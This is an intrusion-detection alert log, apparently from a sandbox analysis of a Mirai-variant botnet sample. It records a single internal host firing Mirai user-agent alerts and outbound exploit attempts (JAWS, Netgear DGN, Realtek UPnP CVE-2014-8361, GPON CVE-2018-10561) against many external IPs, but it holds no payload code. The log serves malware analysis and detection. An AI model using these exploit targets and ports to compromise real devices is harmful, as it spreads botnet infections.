                                                              2024-12-11T00:43:53.348916+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336422165.102.249.298080TCP
                                                              2024-12-11T00:43:53.349645+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234863082.201.90.5880TCP
                                                              2024-12-11T00:43:53.350383+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343248190.58.45.8780TCP
                                                              2024-12-11T00:43:53.350763+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233329275.117.165.285555TCP
                                                              2024-12-11T00:43:53.359235+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234652265.103.37.428080TCP
                                                              2024-12-11T00:43:53.365433+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233990643.240.202.14049152TCP
                                                              2024-12-11T00:43:54.281882+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343954153.243.22.4680TCP
                                                              2024-12-11T00:43:54.281882+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343954153.243.22.4680TCP
                                                              2024-12-11T00:43:54.299810+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359272101.161.105.2137574TCP
                                                              2024-12-11T00:43:54.300546+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233862236.252.136.22480TCP
                                                              2024-12-11T00:43:54.304920+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235697891.36.210.1545555TCP
                                                              2024-12-11T00:43:54.312564+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2338208154.208.202.2248080TCP
                                                              2024-12-11T00:43:54.313305+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356300184.115.100.1635555TCP
                                                              2024-12-11T00:43:54.320206+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2355666102.178.19.1738080TCP
                                                              2024-12-11T00:43:54.334735+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352664205.160.164.4180TCP
                                                              2024-12-11T00:43:54.334735+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352664205.160.164.4180TCP
                                                              2024-12-11T00:43:54.353235+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234336865.30.252.2377574TCP
                                                              2024-12-11T00:43:54.353607+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358198148.241.176.495555TCP
                                                              2024-12-11T00:43:54.357046+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234424250.49.69.8280TCP
                                                              2024-12-11T00:43:54.359965+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360238140.119.137.6880TCP
                                                              2024-12-11T00:43:54.361790+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2354044139.49.74.13280TCP
                                                              2024-12-11T00:43:54.368367+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347876139.34.68.1255555TCP
                                                              2024-12-11T00:43:54.369830+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233456629.79.215.23852869TCP
                                                              2024-12-11T00:43:54.374553+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235571832.154.86.12980TCP
                                                              2024-12-11T00:43:54.461481+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359574175.27.152.19880TCP
                                                              2024-12-11T00:43:54.991377+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338586126.34.221.1977574TCP
                                                              2024-12-11T00:43:55.284241+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339862184.184.118.787574TCP
                                                              2024-12-11T00:43:55.291881+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233711282.181.66.380TCP
                                                              2024-12-11T00:43:55.299498+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235243236.97.33.18749152TCP
                                                              2024-12-11T00:43:55.304956+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359112102.56.202.22580TCP
                                                              2024-12-11T00:43:55.304956+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359112102.56.202.22580TCP
                                                              2024-12-11T00:43:55.331787+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360564211.23.135.1208080TCP
                                                              2024-12-11T00:43:55.344162+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353128193.31.48.987574TCP
                                                              2024-12-11T00:43:55.354426+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23505744.3.110.08080TCP
                                                              2024-12-11T00:43:55.355161+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234833273.52.189.1227574TCP
                                                              2024-12-11T00:43:55.355534+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233720012.231.157.19052869TCP
                                                              2024-12-11T00:43:55.366780+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340940191.76.14.22380TCP
                                                              2024-12-11T00:43:55.366780+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340940191.76.14.22380TCP
                                                              2024-12-11T00:43:55.417069+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2334756131.92.123.178080TCP
                                                              2024-12-11T00:43:55.431254+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235884679.57.139.2188080TCP
                                                              2024-12-11T00:43:55.492747+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2356288163.199.121.380TCP
                                                              2024-12-11T00:43:56.288623+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342166204.128.136.1388080TCP
                                                              2024-12-11T00:43:56.295123+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344122165.47.104.2448080TCP
                                                              2024-12-11T00:43:56.295483+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349556219.249.5.1128080TCP
                                                              2024-12-11T00:43:56.296576+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235842264.254.44.8580TCP
                                                              2024-12-11T00:43:56.321738+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235741616.56.252.1378080TCP
                                                              2024-12-11T00:43:56.347919+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340264110.24.108.2117574TCP
                                                              2024-12-11T00:43:56.366493+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2334364140.253.133.278080TCP
                                                              2024-12-11T00:43:57.280236+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337364141.61.164.1165555TCP
                                                              2024-12-11T00:43:57.295643+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357556112.110.69.178080TCP
                                                              2024-12-11T00:43:57.298573+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235485232.132.72.9552869TCP
                                                              2024-12-11T00:43:57.301842+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2336782219.13.140.6652869TCP
                                                              2024-12-11T00:43:57.313011+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2341844102.24.78.2528080TCP
                                                              2024-12-11T00:43:57.327795+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339172165.215.144.10949152TCP
                                                              2024-12-11T00:43:57.333724+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2349916144.227.196.10080TCP
                                                              2024-12-11T00:43:57.341006+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235969872.133.204.1508080TCP
                                                              2024-12-11T00:43:57.362391+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233858818.56.150.5580TCP
                                                              2024-12-11T00:43:57.373255+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347838148.163.41.367574TCP
                                                              2024-12-11T00:43:57.383225+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356660182.41.168.580TCP
                                                              2024-12-11T00:43:57.383225+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356660182.41.168.580TCP
                                                              2024-12-11T00:43:57.414837+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2341850205.175.182.778080TCP
                                                              2024-12-11T00:43:57.586480+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2337708154.144.254.24280TCP
                                                              2024-12-11T00:43:58.287804+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352954190.249.160.2377574TCP
                                                              2024-12-11T00:43:58.312982+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342338199.4.231.1275555TCP
                                                              2024-12-11T00:43:58.319565+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341090213.120.222.21980TCP
                                                              2024-12-11T00:43:58.319565+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341090213.120.222.21980TCP
                                                              2024-12-11T00:43:58.327556+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360298165.218.169.1478080TCP
                                                              2024-12-11T00:43:58.336304+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235853223.32.17.1908080TCP
                                                              2024-12-11T00:43:58.363352+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234644046.12.15.937574TCP
                                                              2024-12-11T00:43:58.369553+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23501703.3.120.1158080TCP
                                                              2024-12-11T00:43:58.374641+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360128209.120.9.278080TCP
                                                              2024-12-11T00:43:58.430560+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235468227.2.41.24280TCP
                                                              2024-12-11T00:43:58.430685+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233305856.243.106.1198080TCP
                                                              2024-12-11T00:43:58.430883+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2342004180.145.130.5180TCP
                                                              2024-12-11T00:43:58.446116+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2351676163.114.7.6080TCP
                                                              2024-12-11T00:43:58.446271+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234337227.130.12.1680TCP
                                                              2024-12-11T00:43:58.492783+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.236012878.39.176.958080TCP
                                                              2024-12-11T00:43:58.524030+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233650411.240.129.25480TCP
                                                              2024-12-11T00:43:59.078940+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2345186115.9.47.48080TCP
                                                              2024-12-11T00:43:59.292134+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235910299.22.126.25152869TCP
                                                              2024-12-11T00:43:59.320929+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234845046.166.100.14080TCP
                                                              2024-12-11T00:43:59.321666+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235598012.62.192.19449152TCP
                                                              2024-12-11T00:43:59.324219+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23352509.158.231.228080TCP
                                                              2024-12-11T00:43:59.336327+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356456138.194.129.1967574TCP
                                                              2024-12-11T00:43:59.340233+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336494212.30.42.8249152TCP
                                                              2024-12-11T00:43:59.352584+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235729623.245.92.2380TCP
                                                              2024-12-11T00:43:59.383504+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344244156.24.118.3780TCP
                                                              2024-12-11T00:43:59.399121+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2332946143.92.171.2388080TCP
                                                              2024-12-11T00:44:00.190810+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354558175.180.83.2248080TCP
                                                              2024-12-11T00:44:00.279287+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235781475.151.1.3349152TCP
                                                              2024-12-11T00:44:00.279723+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2355994181.86.102.3252869TCP
                                                              2024-12-11T00:44:00.285272+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357832204.117.44.1647574TCP
                                                              2024-12-11T00:44:00.290393+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2347448144.234.158.1738080TCP
                                                              2024-12-11T00:44:00.303101+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338474148.70.224.2105555TCP
                                                              2024-12-11T00:44:00.332326+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345806142.5.217.8180TCP
                                                              2024-12-11T00:44:00.332326+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345806142.5.217.8180TCP
                                                              2024-12-11T00:44:00.359465+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2345632103.118.131.13952869TCP
                                                              2024-12-11T00:44:00.371848+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235385479.67.65.18752869TCP
                                                              2024-12-11T00:44:00.379900+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350720217.188.69.1545555TCP
                                                              2024-12-11T00:44:00.414942+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2355360126.188.12.12680TCP
                                                              2024-12-11T00:44:01.282016+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2356534193.97.60.2118080TCP
                                                              2024-12-11T00:44:01.285279+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333980185.183.174.1695555TCP
                                                              2024-12-11T00:44:01.320367+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2354070104.46.236.10252869TCP
                                                              2024-12-11T00:44:01.321105+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338078110.121.213.1505555TCP
                                                              2024-12-11T00:44:01.322948+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235848436.117.67.1185555TCP
                                                              2024-12-11T00:44:01.335966+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234931212.43.248.20880TCP
                                                              2024-12-11T00:44:01.346655+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.23475762.29.108.18352869TCP
                                                              2024-12-11T00:44:01.378991+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358088210.37.54.13949152TCP
                                                              2024-12-11T00:44:01.385532+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2353672101.39.189.12452869TCP
                                                              2024-12-11T00:44:01.464156+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234577230.60.58.1838080TCP
                                                              2024-12-11T00:44:01.508430+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233659650.110.115.308080TCP
                                                              2024-12-11T00:44:01.727277+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2346258128.148.246.688080TCP
                                                              2024-12-11T00:44:02.282400+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2335746111.106.251.15480TCP
                                                              2024-12-11T00:44:02.309721+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234438041.219.167.2418080TCP
                                                              2024-12-11T00:44:02.310475+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235118089.2.89.845555TCP
                                                              2024-12-11T00:44:02.318108+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.23506886.8.177.5852869TCP
                                                              2024-12-11T00:44:02.336275+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350660143.57.215.24480TCP
                                                              2024-12-11T00:44:02.347931+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357510147.253.7.20649152TCP
                                                              2024-12-11T00:44:02.352667+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234603268.231.125.180TCP
                                                              2024-12-11T00:44:02.369171+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235318096.190.191.6880TCP
                                                              2024-12-11T00:44:02.369171+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235318096.190.191.6880TCP
                                                              2024-12-11T00:44:02.374269+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233904659.119.110.1468080TCP
                                                              2024-12-11T00:44:02.446195+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2336814124.76.112.2108080TCP
                                                              2024-12-11T00:44:02.461478+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233395620.68.156.1588080TCP
                                                              2024-12-11T00:44:02.555408+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235194479.149.151.1880TCP
                                                              2024-12-11T00:44:02.586539+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235691458.68.44.8780TCP
                                                              2024-12-11T00:44:03.286655+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356438159.166.66.22680TCP
                                                              2024-12-11T00:44:03.286655+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356438159.166.66.22680TCP
                                                              2024-12-11T00:44:03.308189+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350938147.235.125.21580TCP
                                                              2024-12-11T00:44:03.323178+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235456032.113.47.18280TCP
                                                              2024-12-11T00:44:03.323178+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235456032.113.47.18280TCP
                                                              2024-12-11T00:44:03.330161+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235132686.62.248.7952869TCP
                                                              2024-12-11T00:44:03.343037+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235624262.49.22.18552869TCP
                                                              2024-12-11T00:44:03.343455+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355552208.178.221.938080TCP
                                                              2024-12-11T00:44:03.379830+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234198089.50.40.6380TCP
                                                              2024-12-11T00:44:03.382558+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234659621.158.101.725555TCP
                                                              2024-12-11T00:44:03.388766+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346614116.71.218.1138080TCP
                                                              2024-12-11T00:44:03.461743+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2350626105.87.20.198080TCP
                                                              2024-12-11T00:44:03.494144+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2360082139.233.195.2198080TCP
                                                              2024-12-11T00:44:04.285748+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233889817.171.111.87574TCP
                                                              2024-12-11T00:44:04.294352+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234840420.93.46.568080TCP
                                                              2024-12-11T00:44:04.304832+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350676120.82.140.13549152TCP
                                                              2024-12-11T00:44:04.314111+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357520121.27.111.295555TCP
                                                              2024-12-11T00:44:04.323773+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342236153.180.40.1305555TCP
                                                              2024-12-11T00:44:04.346343+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233351456.123.14.3380TCP
                                                              2024-12-11T00:44:04.346775+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233714889.176.240.19080TCP
                                                              2024-12-11T00:44:04.346775+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233714889.176.240.19080TCP
                                                              2024-12-11T00:44:04.355942+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234534811.9.68.1578080TCP
                                                              2024-12-11T00:44:04.361763+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335004137.225.175.2058080TCP
                                                              2024-12-11T00:44:04.370198+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348050159.178.106.618080TCP
                                                              2024-12-11T00:44:04.385952+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346198213.205.169.7080TCP
                                                              2024-12-11T00:44:04.392541+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233867025.66.57.12352869TCP
                                                              2024-12-11T00:44:04.495157+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2343248190.58.45.8780TCP
                                                              2024-12-11T00:44:04.495266+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2336422165.102.249.298080TCP
                                                              2024-12-11T00:44:04.495386+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234863082.201.90.5880TCP
                                                              2024-12-11T00:44:04.509409+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234652265.103.37.428080TCP
                                                              2024-12-11T00:44:04.586667+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233637642.123.190.338080TCP
                                                              2024-12-11T00:44:04.878039+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23587903.8.236.2287574TCP
                                                              2024-12-11T00:44:05.306868+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234825270.156.83.1835555TCP
                                                              2024-12-11T00:44:05.315821+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233529031.243.87.20049152TCP
                                                              2024-12-11T00:44:05.317391+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235258025.45.221.2255555TCP
                                                              2024-12-11T00:44:05.321691+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2346300174.65.142.1778080TCP
                                                              2024-12-11T00:44:05.329462+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2334000222.224.154.20952869TCP
                                                              2024-12-11T00:44:05.347895+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2337364112.68.239.8480TCP
                                                              2024-12-11T00:44:05.355163+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233278277.84.251.2397574TCP
                                                              2024-12-11T00:44:05.370704+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233695480.219.171.1118080TCP
                                                              2024-12-11T00:44:05.371894+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2356932191.1.14.23352869TCP
                                                              2024-12-11T00:44:05.372329+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235994239.76.9.18949152TCP
                                                              2024-12-11T00:44:05.377024+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233688877.45.35.7580TCP
                                                              2024-12-11T00:44:05.385651+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2358768126.206.16.1908080TCP
                                                              2024-12-11T00:44:05.430862+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235571832.154.86.12980TCP
                                                              2024-12-11T00:44:05.461732+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233862236.252.136.22480TCP
                                                              2024-12-11T00:44:06.288795+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346118214.64.175.22880TCP
                                                              2024-12-11T00:44:06.295364+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354140140.219.139.21749152TCP
                                                              2024-12-11T00:44:06.303724+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338144146.143.230.22949152TCP
                                                              2024-12-11T00:44:06.313190+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353762221.0.197.1895555TCP
                                                              2024-12-11T00:44:06.322731+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352306208.135.113.12780TCP
                                                              2024-12-11T00:44:06.336012+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343904199.21.178.135555TCP
                                                              2024-12-11T00:44:06.336426+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23465701.131.77.1917574TCP
                                                              2024-12-11T00:44:06.345315+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355506217.93.60.980TCP
                                                              2024-12-11T00:44:06.359885+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236010085.107.234.1768080TCP
                                                              2024-12-11T00:44:06.375018+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344486149.208.223.12580TCP
                                                              2024-12-11T00:44:06.387488+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2333388173.214.173.1628080TCP
                                                              2024-12-11T00:44:06.414747+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23505744.3.110.08080TCP
                                                              2024-12-11T00:44:06.508637+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233711282.181.66.380TCP
                                                              2024-12-11T00:44:06.508764+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2360564211.23.135.1208080TCP
                                                              2024-12-11T00:44:07.300740+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341442123.17.139.1787574TCP
                                                              2024-12-11T00:44:07.301496+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360982192.222.110.2108080TCP
                                                              2024-12-11T00:44:07.315675+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2337590112.185.254.10152869TCP
